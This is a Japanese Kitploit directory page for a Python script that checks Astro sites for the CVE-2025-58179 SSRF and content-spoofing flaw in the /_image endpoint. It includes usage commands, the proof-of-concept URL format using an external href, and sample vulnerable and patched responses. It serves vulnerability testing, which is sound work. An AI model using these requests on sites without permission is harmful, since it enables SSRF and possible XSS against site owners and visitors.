Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-58179-Check — Pythonスクリプト:Astroの`/_image`エンドポイントにおけるSSRFおよびコンテンツスプーフィングの脆弱性(CVE-2025-58179)を検証するためのもので、PoC URLの自動生成とHTTPレスポンス検証を備えています。 | Kitploit
ツール/GitHubGitHub/shitodcy/cve-2025-58179-check
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

Pythonスクリプト:Astroの`/_image`エンドポイントにおけるSSRFおよびコンテンツスプーフィングの脆弱性(CVE-2025-58179)を検証するためのもので、PoC URLの自動生成とHTTPレスポンス検証を備えています。

リポジトリを見る
1210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-58179-Check

CVE-2025-58179-Checkは、Astroフレームワークの/_imageエンドポイントにおけるSSRF(Server-Side Request Forgery)/コンテンツスプーフィングの脆弱性を検証するためのシンプルなPythonスクリプトです。

この脆弱性は GHSA-qpr4-c339-7vq8 および CVE-2025-58179 として追跡されています。

脆弱性の背景

この脆弱性は、output: 'server' 設定で @astrojs/cloudflare アダプタを使用しているAstroサイトに影響します。画像を最適化するための /_image エンドポイントが、href パラメータを適切に検証できません。

これにより、攻撃者はサーバーに不正な外部ドメインからコンテンツを取得させ、表示させることが可能になります。影響はSSRFであり、外部コンテンツが悪意のあるファイル(スクリプトを含むSVGなど)の場合、クロスサイトスクリプティング(XSS) につながる可能性があります。

このスクリプトは、サイトがこの問題に対して脆弱であるかを確認するためのテストプロセスを自動化します。

機能

  • 自動的に正しい形式のPoC(Proof of Concept)URLを生成します。
  • HTTP検証(オプション)を実行し、サーバーの応答を確認します。
  • 出力に色分けを施し、分析を容易にします(ステータスコード、結果)。
  • 脆弱な応答を検出します(例:Content-Type: image/* の ステータス200)。
  • 必要条件

    • Python 3
    • requests ライブラリ(検証機能を使用する場合のみ)

    requests は pip を使用してインストールできます:

    root@kitploit:~
    pip install requests
    

    使用方法

    1. このリポジトリをクローンするか、CVE-2025-58179-Check.py スクリプトをコピーしてください。
    2. 必要に応じてスクリプトに実行権限を付与します:chmod +x CVE-2025-58179-Check.py

    1. URLのみ生成(検証なし)

    このオプションは、エンコードされたPoC URLのみを出力します。ブラウザや他のツールで手動テストを行う場合に便利です。

    コマンド:

    root@kitploit:~
    python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>
    

    例:

    root@kitploit:~
    python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)
    

    出力:

    root@kitploit:~
    [+] Generated URL:
    [https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
    

    2. URLを生成してHTTP検証を実行

    このオプションはURLを生成し、すぐにHTTP GETリクエストを送信してサーバーの応答を検証します。

    コマンド:

    root@kitploit:~
    python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r
    

    例:

    root@kitploit:~
    python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request
    

    検証出力例

    結果例:脆弱(Vulnerable)

    サーバーがステータスコード200を返し、コンテンツタイプが画像である場合、サーバーが外部コンテンツを取得して表示したことを示します。

    root@kitploit:~
    [+] Generated URL:
    [https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
    
    [+] Sending HTTP request...
    [+] Status Code: 200
    [+] Content Type: image/jpeg
    [+] Server returned image content - Potential vulnerability detected!
    

    結果例:非脆弱(パッチ適用済み)

    パッチが適用された、または適切に設定されたサーバーは、不正な外部ドメインへのリクエストを拒否し、通常は4xxステータスを返します。

    root@kitploit:~
    [+] Generated URL:
    [https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
    
    [+] Sending HTTP request...
    [+] Status Code: 400
    [+] Content Type: text/plain;charset=UTF-8
    [+] Client error - Resource might not be accessible
    

    [!WARNING]

    警告

    • このスクリプトは教育および正当なセキュリティテストを目的として作成されています。
    • ユーザーは自身の行動に対して全責任を負います。許可のないシステムでこのスクリプトを使用しないでください。
    ツールをダウンロード